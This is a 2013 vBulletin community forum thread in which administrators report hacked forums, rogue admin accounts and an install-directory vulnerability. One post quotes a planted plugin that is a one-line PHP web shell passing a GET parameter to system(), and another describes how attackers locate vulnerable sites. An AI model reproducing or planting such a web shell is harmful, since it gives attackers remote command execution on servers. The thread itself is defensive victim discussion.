Announcement

Collapse
No announcement yet.

A new type hack method?

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • ToddG
    replied
    Originally posted by KryptonSite View Post
    I just noticed I had a new user registered on my forum calling himself "administrator." Found it fishy, and saw they put themselves in the administrator area... with no IP address tied to anything and a clearly fake e-mail address. Banned the account.

    I've deleted my install directory since then though, but what I'm wondering is... is this tied to that install directory exploit? Or has anyone else witnessed something like this?
    This exact thing happened to our forum today, as well. We've deleted the install directory and his account and are now trying to figure out what, if anything, he may have done to our system.

    Leave a comment:


  • runawayjim
    replied
    my ajax_start plugin seems to be failing. the code in it looks suspect, but it could be normal.

    there is a file called fuhosin.php in my /forum/ directory that is signed by a hacker. I deleted it. Not sure if a different version of that should be there or not

    Leave a comment:


  • Reignman
    replied
    Originally posted by djsteve007 View Post
    vbulletin 4.2.1 running, and had new member moderation turned on -

    what I wonder is how they were able to run sql insert commands from /forums/core/install/upgrade.php --- when I do not even have a /core/ or /core/install/ folder on this server.
    If you use version 4, you don't have /core/install but only /install in your forum root.

    Leave a comment:


  • DemOnstar
    replied
    Originally posted by djsteve007 View Post

    Will we get an email if the exploit fix is found?
    I think that is extremely likely now. Although, stranger things can happen..

    Leave a comment:


  • DemOnstar
    commented on 's reply
    Very good Reignman, that is exactly what I wanted to hear...It seems so easy to mess up someones life..and all that is needed is a search on Google.. Extraordinary!

  • djsteve007
    replied
    Looks like I got hit with a similar exploit - they did not deface my site like the OP's - not yet anyway. They did find a way to add about 10 new users, all with the same username, (Th3H4ck) and all with admin privs.

    I would not have known about this vulnerability, or the active exploit, if they had not .. maybe I should not post what triggered my knowledge of this.

    I would of like to have received an email about this exploit. Now going to 302 redirect to my buddypress install. Hope my host has backup database and files from 5 days ago. Fingers crossed.

    vbulletin 4.2.1 running, and had new member moderation turned on -

    what I wonder is how they were able to run sql insert commands from /forums/core/install/upgrade.php --- when I do not even have a /core/ or /core/install/ folder on this server.

    Will we get an email if the exploit fix is found?

    Leave a comment:


  • mat8861
    replied
    What about VB not sending an advice email to licensed members ?? I was here for another problem and now I am reading this thread, really surprised !!

    Leave a comment:


  • Reignman
    replied
    Originally posted by DemOnstar View Post
    How does something like this get around so quickly?
    Not a robot, or a macro, this is an individual or group of individuals exploiting a vulnerability...
    I haven't been affected yet, maybe because I was active in the admin cp at the time of the notification and deleted the install folder?

    But is the install folder the hole? Has this been clarified?

    How do they find a vulnerable site to begin with? Surely there is no google search term 'vulnerable vB sites'.

    What do they search for in order to complete the job?
    Yes, hole is in the install folder (at least for this exploit)

    They search for vbulletin powered websites using phrases like (powered by vbulletin 4.2.0 / 4.2.1 / 5) and then they check manually if install folder exists by typing domain.com/forumpath/install/upgrade.php

    If it exists they complete the job using exploit they found. (I wonder if vbulletin team has found what is it yet??? ) If it doesn't exist, they turn back to "Google" and search for other potential victims.

    But what we know is they can use this exploit for only 4.2.0+ and 5 versions of vbulletin.
    Last edited by Reignman; Mon 2 Sep '13, 6:01am.

    Leave a comment:


  • DemOnstar
    replied
    How does something like this get around so quickly?
    Not a robot, or a macro, this is an individual or group of individuals exploiting a vulnerability...
    I haven't been affected yet, maybe because I was active in the admin cp at the time of the notification and deleted the install folder?

    But is the install folder the hole? Has this been clarified?

    How do they find a vulnerable site to begin with? Surely there is no google search term 'vulnerable vB sites'.

    What do they search for in order to complete the job?

    Leave a comment:


  • Jntu Hub
    replied
    my site was hacked with new name

    Leave a comment:


  • Reignman
    replied
    Originally posted by KryptonSite View Post
    I just noticed I had a new user registered on my forum calling himself "administrator." Found it fishy, and saw they put themselves in the administrator area... with no IP address tied to anything and a clearly fake e-mail address. Banned the account.

    I've deleted my install directory since then though, but what I'm wondering is... is this tied to that install directory exploit? Or has anyone else witnessed something like this?
    Do you have any "strange" plugin on your vbulletin products? It's one of the smyptoms of this exploit.

    Originally posted by Infection View Post

    I'm using version 4.2.0 (I've yet to update to the latest 4.2.1 version). There is definitely no "install" directory in my forum's root folder, as far as I can see. It could be another vulnerability.

    Does anyone have any ideas as to what this could be?
    Probably it's another one. Better contact to vbulletion support.

    Bad thing is I see slight changes on codes, hacking messages. So I think it's now spreaded around.

    Leave a comment:


  • Infection
    replied
    Originally posted by Reignman View Post

    Which version do you use? If you use vBulletin 5, install directory is inside core directory. >>> /core/install

    He needs install/upgrade.php in order to complete hijacking, so if you don't have "install" directory and still you have the above problem, that means it's another vulnerability.
    I'm using version 4.2.0 (I've yet to update to the latest 4.2.1 version). There is definitely no "install" directory in my forum's root folder, as far as I can see. It could be another vulnerability.

    Does anyone have any ideas as to what this could be?

    Leave a comment:


  • KryptonSite
    replied
    I just noticed I had a new user registered on my forum calling himself "administrator." Found it fishy, and saw they put themselves in the administrator area... with no IP address tied to anything and a clearly fake e-mail address. Banned the account.

    I've deleted my install directory since then though, but what I'm wondering is... is this tied to that install directory exploit? Or has anyone else witnessed something like this?

    Leave a comment:


  • Reignman
    replied
    Originally posted by Infection View Post
    I have the same problem. The hacker has registered as an Admin, then created this a plugin with the hook location ajax_start:

    Code:
    if(isset($_GET['lol'])){echo
    "<h1>pwn</h1><pre>"; system($_GET
    ['lol']);exit;}
    Please advise. I don't have the install directory at all prior to this hack.
    Which version do you use? If you use vBulletin 5, install directory is inside core directory. >>> /core/install

    He needs install/upgrade.php in order to complete hijacking, so if you don't have "install" directory and still you have the above problem, that means it's another vulnerability.

    Leave a comment:


  • Infection
    replied
    I have the same problem. The hacker has registered as an Admin, then created this a plugin with the hook location ajax_start:

    Code:
    if(isset($_GET['lol'])){echo
    "<h1>pwn</h1><pre>"; system($_GET
    ['lol']);exit;}
    Please advise. I don't have the install directory at all prior to this hack.

    Leave a comment:

widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
Working...
X